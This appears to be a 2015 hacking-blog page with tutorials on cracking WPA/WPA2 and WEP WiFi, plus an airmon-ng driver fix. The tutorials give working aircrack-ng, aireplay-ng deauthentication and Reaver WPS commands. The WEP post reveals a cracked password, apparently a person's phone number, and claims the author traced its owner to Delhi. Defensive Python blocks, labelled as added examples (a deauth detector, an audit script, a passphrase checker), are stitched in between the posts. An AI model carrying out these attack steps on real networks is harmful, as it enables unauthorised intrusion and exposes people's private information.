Tuesday, 14 July 2015

How To Hack WPA or WPA2 WiFi Security Fully Explained

12:44 pm
Compared to WEP cracking, explained in our previous tutorial, WPA/WPA2 is considerably harder and more time consuming because of its stronger security. Cracking the passphrase sometimes comes down to luck, and success is not guaranteed.

..:: How to launch a Dictionary Attack on WPA Handshake ::..

You might get lucky: the nearest WiFi password may be a common dictionary word or a number sequence. In that case a dictionary attack may succeed.

Step 1: Enable monitor mode on wireless interface

#airmon-ng start wlan0

This will start the monitor mode.

Step 2: Take note of the nearest WiFi networks.

#airodump-ng mon0

Step 3: Take note of the channel of your target network, then dump packets from that channel and save them to a local capture file.

#airodump-ng -c6 mon0 -w capture_file

Step 4: Wait for a WPA handshake to be captured

At this point you can use 'aireplay-ng' to de-authenticate a legitimate client that is associated with the network. Because the client will re-authenticate shortly afterwards, the handshake is captured without a long wait:

#aireplay-ng --deauth 0 -a <AP_MAC> -c <CLIENT_MAC> mon0

If you don't know the MAC of any associated client, simply 'broadcast' a 'deauth' to all clients:

#aireplay-ng --deauth 0 -a <AP_MAC> mon0
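The de-authentication step above is also what a wireless IDS looks for: a normal access point sends deauthentication frames rarely, so a burst of them from one BSSID, or a deauth addressed to the broadcast address, is a strong signal that someone is forcing handshakes. The following detector is an added example and not part of the original tutorial. It parses the fixed 24-byte 802.11 MAC header (type/subtype from the frame-control octet, the three addresses, and the reason code that follows the header in deauth frames) and raises an alert on a broadcast deauth or on more than a threshold of deauths from one sender inside a sliding window. The frames, MAC addresses, window and threshold are all constructed for the example; a real capture carries a radiotap header in front of each frame, which has to be stripped first.

```python
import struct
from collections import defaultdict

BROADCAST = "ff:ff:ff:ff:ff:ff"
MGMT, DEAUTH, DISASSOC, BEACON = 0, 0xC, 0xA, 0x8


def mac_str(b):
    return ":".join(f"{x:02x}" for x in b)


def mac_bytes(s):
    return bytes(int(x, 16) for x in s.split(":"))


def parse_frame(frame):
    """Parse the 24-byte 802.11 MAC header (radiotap already stripped).

    Returns type/subtype and the three addresses, plus the reason code for
    deauthentication/disassociation frames, or None if the frame is too short.
    """
    if len(frame) < 24:
        return None
    fc0 = frame[0]                       # frame control, first octet
    info = {
        "type": (fc0 >> 2) & 0x3,        # 0 = management, 1 = control, 2 = data
        "subtype": (fc0 >> 4) & 0xF,
        "dst": mac_str(frame[4:10]),     # addr1
        "src": mac_str(frame[10:16]),    # addr2
        "bssid": mac_str(frame[16:22]),  # addr3
    }
    if info["type"] == MGMT and info["subtype"] in (DEAUTH, DISASSOC) and len(frame) >= 26:
        info["reason"] = struct.unpack_from("<H", frame, 24)[0]
    return info


def detect_deauth_flood(records, window_s=10.0, threshold=5):
    """Walk (timestamp, raw_frame) records and alert on broadcast deauths and on
    `threshold` deauths from one sender within `window_s` seconds.
    Window and threshold are tuning assumptions for the example."""
    alerts = []
    recent = defaultdict(list)           # (bssid, src) -> deauth timestamps in window
    for ts, raw in sorted(records, key=lambda r: r[0]):
        info = parse_frame(raw)
        if not info or info["type"] != MGMT or info["subtype"] != DEAUTH:
            continue
        key = (info["bssid"], info["src"])
        times = recent[key]
        times.append(ts)
        while times and ts - times[0] > window_s:
            times.pop(0)
        base = {"bssid": info["bssid"], "src": info["src"], "time": ts, "reason": info.get("reason")}
        if info["dst"] == BROADCAST:
            alerts.append(dict(base, kind="broadcast_deauth"))
        if len(times) == threshold:      # fire once when the window first fills
            alerts.append(dict(base, kind="deauth_flood", count=threshold))
    return alerts


# --- constructed capture records: header-only frames, built in memory, never transmitted ---
def _sample_frame(fc0, dst, src, bssid, body=b""):
    return (bytes([fc0, 0]) + b"\x00\x00" + mac_bytes(dst) + mac_bytes(src)
            + mac_bytes(bssid) + b"\x00\x00" + body)


AP, CLIENT = "02:00:00:00:aa:01", "02:00:00:00:bb:02"   # locally administered, made up
SAMPLE = [
    (0.0, _sample_frame(0x80, BROADCAST, AP, AP)),     # beacon
    (0.5, _sample_frame(0x08, AP, CLIENT, AP)),        # data frame from the client
]
for i in range(8):                                     # eight deauths in under a second
    SAMPLE.append((1.0 + i * 0.1, _sample_frame(0xC0, CLIENT, AP, AP, struct.pack("<H", 7))))
SAMPLE.append((3.0, _sample_frame(0xC0, BROADCAST, AP, AP, struct.pack("<H", 7))))

if __name__ == "__main__":
    for alert in detect_deauth_flood(SAMPLE):
        print(alert)
```

On the constructed capture the detector fires twice: once when the fifth deauth from the AP's address lands inside the window, and once for the broadcast deauth. Reason code 7 is only recorded, not used for the decision, because legitimate deauths carry a range of codes too.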

Step 5: After you grab a WPA handshake comes the hard part: brute forcing the passphrase with a dictionary. Use 'aircrack-ng' for this:

#aircrack-ng capture_file-01.cap -w listfile.lst

Now say your prayers and hope the passphrase is in the dictionary you chose.

You can also use an online distributed WPA/WPA2 handshake cracking tool on this website:

Note that if the access point has WPS enabled, recovering the WPA/WPA2 passphrase becomes easier: because of an implementation flaw, only 11,000 combinations need to be tried to brute force the WPS PIN.

Another tool, 'Reaver', can be used for WPA cracking when WPS is enabled.

Here's a sample use of reaver:

#reaver -i mon1 -a 94:D7:23:48:BE:78 -vv -c8

-i is for interface
-a "94.... " is the bssid of hotspot
-vv for verbose mode
-c to specify the channel

Disclaimer: This is for experimentation or authorized penetration testing purposes only.

Tutorial by : Pranshu

How To Hack WEP WiFi Security Fully Explained

11:48 am
Hello friends, today we are going to learn how to hack a WEP-protected WiFi network by cracking its password.

WiFi security is mostly WEP, WPA or WPA2-PSK. Of these, WEP is the weakest and the easiest to hack, while WPA and WPA2 use stronger encryption. This tutorial covers WEP hacking.

Things required -> Backtrack or Kali Linux

..:: WEP Cracking ::..

No doubt, WEP is the easiest to crack. Here's how:

Step 1 : First we need to start monitor mode. Many people face a 'no interface' issue when running airmon-ng; see the solution here -> http://sh.st/cXO1I

#airmon-ng start wlan0

Notice that monitor mode is enabled on mon1 (on top of wlan0); take note of this, as we will need this interface later.

Step 2 : Now start dumping data packets with airodump-ng

#airodump-ng mon1

You'll see all the WiFi networks in range, with different security types: WEP, WPA and WPA2. We are going to pick a WEP network.

It is also important to note the other information shown here, as it determines how easily you get into the WiFi:
  • BSSID is the MAC address of the WiFi network.
  • PWR tells you the signal strength.
  • Beacons are frames sent by the hotspot to announce its presence.
  • Data is the count of data packets, which are what we are interested in. The more data packets we have, the more certain we are to crack the hotspot.
  • CH tells you the channel used by the hotspot.
So I use airodump-ng to focus on dumping packets from this particular BSSID and store them in a file:

#airodump-ng -w wap -c 8 --bssid 14:D6:4D:A6:F6:69 mon1

-w specifies the output file prefix, -c the channel, and --bssid restricts the capture to that access point.

Capturing now starts and we play the waiting game: collect enough packets before trying to crack the password. Usually we wait until around 20000 packets have been captured.

How long this takes depends on the traffic flow on that BSSID and your distance from the BSSID.
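The same airodump-ng columns described above are what a defender reads when auditing a site: which networks are still on WEP or open, how much traffic they carry, and how many clients depend on them. The script below is an added example, not code from the tutorial. It parses a capture summary in the layout of airodump-ng's CSV export (the "-w prefix" also writes prefix-NN.csv; the exact column list is an assumption about that format) and ranks access points by how weak their configuration is. The BSSIDs, ESSIDs and counts are all constructed.

```python
import csv
import io
from collections import Counter

# Constructed sample in the layout of airodump-ng's CSV export; addresses and names are made up.
SAMPLE_CSV = """
BSSID, First time seen, Last time seen, channel, speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key
02:00:00:00:aa:01, 2015-07-14 10:02:11, 2015-07-14 10:20:45,  8,  54, WEP , WEP, , -41,  412, 20013,   0.  0.  0.  0,   7, HomeNet, 
02:00:00:00:aa:02, 2015-07-14 10:02:11, 2015-07-14 10:20:45,  6,  54, WPA2, CCMP, PSK, -55,  390,    12,   0.  0.  0.  0,   6, Office, 
02:00:00:00:aa:03, 2015-07-14 10:02:13, 2015-07-14 10:20:44,  1,  54, OPN , , , -70,  201,     0,   0.  0.  0.  0,   8, CafeFree, 
02:00:00:00:aa:04, 2015-07-14 10:02:15, 2015-07-14 10:20:40, 11,  54, WPA , TKIP, PSK, -62,  350,   140,   0.  0.  0.  0,   6, Legacy, 

Station MAC, First time seen, Last time seen, Power, # packets, BSSID, Probed ESSIDs
02:00:00:00:bb:01, 2015-07-14 10:03:00, 2015-07-14 10:20:45, -48,  9800, 02:00:00:00:aa:01, HomeNet
02:00:00:00:bb:02, 2015-07-14 10:03:10, 2015-07-14 10:20:45, -50, 10100, 02:00:00:00:aa:01, 
02:00:00:00:bb:03, 2015-07-14 10:04:00, 2015-07-14 10:20:45, -57,   300, 02:00:00:00:aa:02, Office
"""


def parse_airodump_csv(text):
    """Split the two sections (access points, then stations) into lists of dicts.
    '# IV' is the data-packet counter shown as #Data on the live screen."""
    aps, stations, section = [], [], None
    for row in csv.reader(io.StringIO(text)):
        row = [cell.strip() for cell in row]
        if not any(row):
            continue
        if row[0] == "BSSID":
            section = "ap"
            continue
        if row[0] == "Station MAC":
            section = "sta"
            continue
        if section == "ap" and len(row) >= 14:
            aps.append({"bssid": row[0], "channel": int(row[3]), "privacy": row[5],
                        "cipher": row[6], "auth": row[7], "power": int(row[8]),
                        "beacons": int(row[9]), "data": int(row[10]), "essid": row[13]})
        elif section == "sta" and len(row) >= 6:
            stations.append({"mac": row[0], "power": int(row[3]),
                             "packets": int(row[4]), "bssid": row[5]})
    return aps, stations


def audit(aps, stations):
    """Rank access points by weakness: open > WEP > WPA/TKIP; WPA2/CCMP is not reported."""
    clients = Counter(s["bssid"] for s in stations)
    findings = []
    for ap in aps:
        if ap["privacy"] == "OPN":
            issue, severity = "no encryption at all", 3
        elif "WEP" in ap["privacy"]:
            issue, severity = (f"WEP with {ap['data']} data packets already observed; "
                               "the key is recoverable from traffic"), 2
        elif "TKIP" in ap["cipher"]:
            issue, severity = "WPA/TKIP, a deprecated cipher", 1
        else:
            continue
        findings.append({"essid": ap["essid"], "bssid": ap["bssid"], "channel": ap["channel"],
                         "clients": clients[ap["bssid"]], "severity": severity, "issue": issue})
    return sorted(findings, key=lambda f: -f["severity"])


if __name__ == "__main__":
    aps, stations = parse_airodump_csv(SAMPLE_CSV)
    for finding in audit(aps, stations):
        print(f"[{finding['severity']}] {finding['essid']} ({finding['bssid']}, ch {finding['channel']}, "
              f"{finding['clients']} clients): {finding['issue']}")
```

The client count matters for remediation planning: a WEP network with two active stations cannot simply be switched off, it has to be re-keyed to WPA2 and the stations reconfigured. airodump-ng does not quote fields, so an ESSID containing a comma would shift the columns; in practice check the ID-length column against the ESSID you parsed.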

STEP 3 : If it is taking too long to grab the required number of packets, you can use aireplay-ng:

#aireplay-ng -b 14:D6:4D:A6:F6:69 -h 00:11:22:33:44:55 mon1

-b specifies the BSSID

-h specifies your own hardware (MAC) address

aireplay-ng will start generating bogus traffic so that you can grab enough data packets quickly.

STEP 4 : Now that we have enough data packets (42445), we can start cracking the password.

#aircrack-ng wap-02.cap

wap-02.cap is the file in which the captured packets were saved (airodump-ng appends a sequence number to the -w prefix).

Now just wait for a while and aircrack-ng will give you the cracked password:

So as we can see, the password is 9212173318. It seems it's someone's cell phone number. I traced its location and it's based in Delhi. It is bad practice to use personal information as a password.
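The two weak-passphrase cases this page runs into, a dictionary word in the WPA post and a phone number here, are exactly what a passphrase policy should reject before a network goes live. The checker below is an added example, not part of either tutorial. It classifies a WPA/WPA2 passphrase by the pattern a dictionary attack would exploit and sizes the resulting search space in bits; the word list is a tiny constructed stand-in, the 14-million figure is an approximation of a rockyou-sized list, and the 60-bit policy threshold is a choice for the example, not a standard.

```python
import math
import re

# Tiny stand-in for a real wordlist (assumption); ASSUMED_WORDLIST_SIZE approximates a
# rockyou-sized list and is only used to size the search space a dictionary attack faces.
COMMON_WORDS = {"password", "letmein", "welcome", "iloveyou", "sunshine", "football", "internet", "qwerty"}
ASSUMED_WORDLIST_SIZE = 14_000_000


def classify(passphrase):
    """Return (pattern, search_space_bits, notes) for a WPA/WPA2 passphrase.

    search_space_bits is log2 of the number of candidates an attacker who has
    guessed the pattern must try; lower means a dictionary attack finishes sooner.
    """
    notes = []
    n = len(passphrase)
    if not 8 <= n <= 63:
        notes.append("length outside the 8-63 characters WPA allows")
    lower = passphrase.lower()
    if passphrase.isdigit():
        if n == 10:
            notes.append("10 digits: looks like a phone number")
        return "digit-only", n * math.log2(10), notes
    if lower in COMMON_WORDS:
        return "dictionary word", math.log2(ASSUMED_WORDLIST_SIZE), notes
    m = re.fullmatch(r"([a-z]+)(\d{1,4})", lower)       # word followed by a year or short number
    if m and m.group(1) in COMMON_WORDS:
        bits = math.log2(ASSUMED_WORDLIST_SIZE) + len(m.group(2)) * math.log2(10)
        return "dictionary word + digits", bits, notes
    pool = 0                                             # fall back to a character-class estimate
    for pattern, size in ((r"[a-z]", 26), (r"[A-Z]", 26), (r"\d", 10), (r"[^A-Za-z0-9]", 33)):
        if re.search(pattern, passphrase):
            pool += size
    if pool == 0:
        return "empty", 0.0, notes
    return "mixed", n * math.log2(pool), notes


def worst_case_seconds(bits, guesses_per_second):
    """Seconds to exhaust the space at a measured guess rate (none is assumed here;
    WPA's PBKDF2 derivation makes each guess deliberately slow, so measure on your own hardware)."""
    return 2 ** bits / guesses_per_second


def is_acceptable(passphrase, min_bits=60):
    """Policy check: reject patterns an offline dictionary attack would finish quickly.
    60 bits is a policy choice for this example, not a standard."""
    pattern, bits, notes = classify(passphrase)
    return bits >= min_bits and not notes


if __name__ == "__main__":
    for candidate in ("9876543210", "football", "sunshine2015", "Nt7!pq-Wz9$kLm2e"):
        print(candidate, classify(candidate), is_acceptable(candidate))
```

A ten-digit number gives about 33 bits, a word from a large list about 24, and a word plus a four-digit year about 37; a sixteen-character random passphrase from the printable set is over 100 bits, which is why the tutorial's "say your prayers" step fails against it.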

Hope you all enjoyed the tutorial. Any queries comment below or visit us at https://www.facebook.com/kiithackers

Credits > Pranshu

Resolution: Airmon-ng Showing No Interface

10:35 am
Today we are going to show you a solution for the most common error people face while running airmon-ng: no interface is listed, as shown below:

So how to fix this issue?

Step 1 : Before starting, make sure that you have an Internet connection on your Backtrack or Kali Linux machine. If you are using a VM, make sure the VM network adapter is bridged with the physical network.

Step 2 : Next, go to http://linuxwireless.org/download/compat-wireless-2.6/ and download the compat-wireless-2010-06-26-p.tar.bz2 file onto your Backtrack or Kali machine.

Step 3 : After downloading, extract the file, since it is a compressed archive (*.tar.bz2). Go to the directory where you saved it and run:

tar -jxvf compat-wireless-2010-06-26-p.tar.bz2

Step 4 : After extracting, change into the directory that was created, run 'make unload' and then 'make load' (to load the new driver), and you will now be able to see the interface.

Check out the video for more clarification:
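Before replacing the wireless driver with a package from 2010, it is worth finding out why airmon-ng shows nothing: the kernel may not have registered a phy at all (driver or firmware missing), the phy may exist without an interface (often rfkill), or the driver may simply not support monitor mode. The diagnostic below is an added example, not part of the original post. It parses the text that 'iw dev' and 'iw phy' print (the samples are constructed; the exact indentation is an assumption about the tool's output) and returns the likely cause.

```python
# Constructed samples laid out the way `iw dev` and `iw phy` print on Linux (assumption about
# the exact layout); in real use, capture the text with: iw dev ; iw phy
IW_DEV_SAMPLE = ("phy#0\n\tInterface wlan0\n\t\tifindex 3\n\t\twdev 0x1\n"
                 "\t\taddr 02:00:00:00:00:01\n\t\ttype managed\n")
IW_PHY_MONITOR_OK = ("Wiphy phy0\n\tSupported interface modes:\n\t\t * IBSS\n\t\t * managed\n"
                     "\t\t * AP\n\t\t * monitor\n\tBand 1:\n\t\tCapabilities: 0x1062\n")
IW_PHY_NO_MONITOR = "Wiphy phy0\n\tSupported interface modes:\n\t\t * managed\n\tBand 1:\n"


def parse_iw_dev(text):
    """Map each phy to its interfaces, e.g. {"phy0": [("wlan0", "managed")]}."""
    phys, phy = {}, None
    for line in text.splitlines():
        s = line.strip()
        if s.startswith("phy#"):
            phy = "phy" + s[4:]
            phys.setdefault(phy, [])
        elif s.startswith("Interface ") and phy is not None:
            phys[phy].append([s.split()[1], None])
        elif s.startswith("type ") and phy is not None and phys[phy]:
            phys[phy][-1][1] = s.split()[1]
    return {p: [tuple(iface) for iface in v] for p, v in phys.items()}


def supported_modes(phy_text):
    """Collect the entries listed under 'Supported interface modes:' in `iw phy` output."""
    modes, inside = set(), False
    for line in phy_text.splitlines():
        s = line.strip()
        if s.startswith("Supported interface modes:"):
            inside = True
        elif inside and s.startswith("* "):
            modes.add(s[2:].strip())
        elif inside:
            inside = False            # a new section began
    return modes


def diagnose(dev_text, phy_text):
    """Explain why airmon-ng would show no usable interface, before touching drivers."""
    phys = parse_iw_dev(dev_text)
    if not phys:
        return "no wireless phy registered: the kernel driver or firmware for the card is not loaded"
    if not any(phys.values()):
        return "phy present but no interface on it: check rfkill and the driver's dmesg output"
    if "monitor" not in supported_modes(phy_text):
        return "driver does not advertise monitor mode: this card/driver cannot be used for capture"
    names = ", ".join(name for ifaces in phys.values() for name, _ in ifaces)
    return f"ok: {names} present and monitor mode is supported"


if __name__ == "__main__":
    print(diagnose(IW_DEV_SAMPLE, IW_PHY_MONITOR_OK))
    print(diagnose(IW_DEV_SAMPLE, IW_PHY_NO_MONITOR))
    print(diagnose("", IW_PHY_MONITOR_OK))
```

Only the first case (no phy at all) is the one the compat-wireless procedure above addresses; in the other two, installing a different driver package will not help and may leave the system with a mismatched kernel module.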

Feel free to comment below your queries.
